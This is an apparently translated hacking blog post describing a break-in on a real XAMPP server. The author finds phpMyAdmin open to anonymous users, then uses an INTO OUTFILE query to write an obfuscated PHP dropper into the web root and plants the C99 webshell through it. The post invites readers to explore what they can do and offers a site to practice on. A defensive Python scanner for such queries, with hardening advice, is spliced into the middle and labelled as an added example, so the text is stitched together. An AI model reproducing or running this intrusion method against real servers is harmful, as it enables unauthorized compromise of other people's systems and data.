intrusion into a server through XAMPP, so I decided to run some tests to see whether this technique worked. My friend @yoyahack wrote an entry on his blog explaining how INTO OUTFILE works; for more information, see "Explanation of INTO OUTFILE in a SQL injection".
I looked for a site that had phpMyAdmin open to anonymous users. Once inside phpMyAdmin, I opened phpinfo to see where the installation folder was located, because we will need it later when creating the malicious file. In this case, it is in the following path:
#
SCRIPT_FILENAME C:/xampp/htdocs/xampp/phpinfo.php
#
Then we build and run a query in MySQL within phpMyAdmin, as follows, in order to create a file that will allow us to upload a WebShell.
Figure: the execution of the query.
#
SELECT '<?php $file = crearcadena(array(115,117,98,101,116,101,46,112,104,112));
$contenido = crearcadena(array(/* long list of character codes omitted */));
$fp = fopen($file, crearcadena(array(97)));
$write = fputs($fp, $contenido);
fclose($fp);
function crearcadena(array $values) {
    if ($values) {
        foreach ($values as $value) {
            $str .= chr($value);
        }
    }
    return $str;
}
?>'
INTO OUTFILE 'C:/xampp/htdocs/upload.php'
#
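From the defender's side, the INTO OUTFILE step above is visible in the SQL the server executes. The following is an added example, not code from the original post: a Python sketch that classifies logged statements by where they write a file. The web-root list, the extension list and the sample statements are assumptions constructed for illustration.

```python
import re

# Assumptions for this sketch: the web root below (taken from the path shown in
# the post) and the list of script extensions; adjust both for a real server.
WEB_ROOTS = ["c:/xampp/htdocs"]
SCRIPT_EXTS = {"php", "phtml", "php5", "phar"}

# INTO OUTFILE / INTO DUMPFILE followed by a quoted target path.
OUTFILE_RE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s*(['\"])(.+?)\1", re.I | re.S)

def normalize(path):
    """Lower-case the path, unify separators and resolve '..' segments."""
    p = path.replace("\\\\", "/").replace("\\", "/").lower()
    parts = []
    for seg in p.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg not in ("", "."):
            parts.append(seg)
    return "/".join(parts)

def classify(statement):
    """Return (severity, target) for one SQL statement, or None if it writes no file."""
    m = OUTFILE_RE.search(statement)
    if not m:
        return None
    target = normalize(m.group(2))
    name = target.rsplit("/", 1)[-1]
    is_script = "." in name and name.rsplit(".", 1)[-1] in SCRIPT_EXTS
    in_web_root = any(target.startswith(root + "/") for root in WEB_ROOTS)
    if in_web_root and (is_script or "<?" in statement):
        return ("critical", target)
    if in_web_root or is_script:
        return ("high", target)
    return ("review", target)

# Constructed sample statements, as they might appear in a MySQL general query log.
SAMPLES = [
    "SELECT '<?php /* body omitted */ ?>' INTO OUTFILE 'C:/xampp/htdocs/upload.php'",
    r"SELECT id FROM users INTO OUTFILE 'C:\\backup\\..\\xampp\\htdocs\\export.csv'",
    "SELECT * FROM orders INTO OUTFILE '/var/tmp/orders.csv'",
    "SELECT * FROM users WHERE name = 'bob'",
]

def scan(statements):
    """Classify every statement and keep only those that write a file."""
    return [(sev, tgt) for sev, tgt in filter(None, map(classify, statements))]

if __name__ == "__main__":
    for severity, target in scan(SAMPLES):
        print(f"{severity:8} {target}")
```

Setting MySQL's `secure_file_priv` to a directory outside the web root (or to NULL) and requiring authentication for phpMyAdmin removes the two preconditions this post relies on.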
Now we only need to enter the PATH of the file subete.php, which would look like this:
#
http://PATH/subete.php
#
We find an upload form where we can upload any kind of file; this time we upload the shell C99.php.
Figure: shows where we uploaded the file.
Now we have the WebShell on the server and can move between directories and much more.
Figure 3. Image of the WebShell in action.
We already have everything; all that remains is to use our imagination to see what we do with it.
I leave a site to practice
Greetings to all the fucking especially
Progressive Death alias.